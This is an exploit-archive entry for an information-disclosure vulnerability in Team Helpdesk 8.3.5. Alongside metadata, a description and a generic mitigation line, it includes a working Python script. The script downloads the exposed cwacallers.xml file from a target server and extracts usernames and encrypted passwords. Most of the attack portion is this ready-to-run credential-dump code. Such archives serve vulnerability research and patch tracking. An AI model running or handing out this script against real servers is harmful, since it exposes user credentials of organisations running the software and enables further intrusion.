Team Helpdesk Information Disclosure Vulnerability

vendor:

Team Helpdesk

by:

bhamb

7,5

CVSS

HIGH

Information Disclosure

200

CWE

Product Name: Team Helpdesk

Affected Version From: 8.3.5

Affected Version To: 8.3.5

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

Team Helpdesk Information Disclosure Vulnerability

AssistMyTeam Team Helpdesk is prone to multiple information-disclosure vulnerabilities. Successfully exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/67271/info

AssistMyTeam Team Helpdesk is prone to multiple information-disclosure vulnerabilities.

Successfully exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks.

Team Helpdesk 8.3.5 is vulnerable; other versions may also be affected. 

#!/usr/bin/python

import sys
import re
import os
import subprocess

print "This is an User Credential Dump for Team Helpdesk Customer Wev Service 8.3.5 (and prior) by bhamb.\n"
print "Send any comment to ccb3b72@gmail.com\n"

if len(sys.argv) != 2:
	print('Usage: user_cred_dump.py https://Hostname.com')
	exit(1)

hostname=sys.argv[1]+"/cws/bin/cwacallers.xml"
print hostname
subprocess.Popen(['wget', '--no-check-certificate',hostname]).communicate()

print "The following usernames and encrypted password were found.\n"
cmd="cat cwacallers.xml | grep '@' | cut -d'\"' -f4,6 | sed 's/\"/:/g' "
test=os.system(cmd)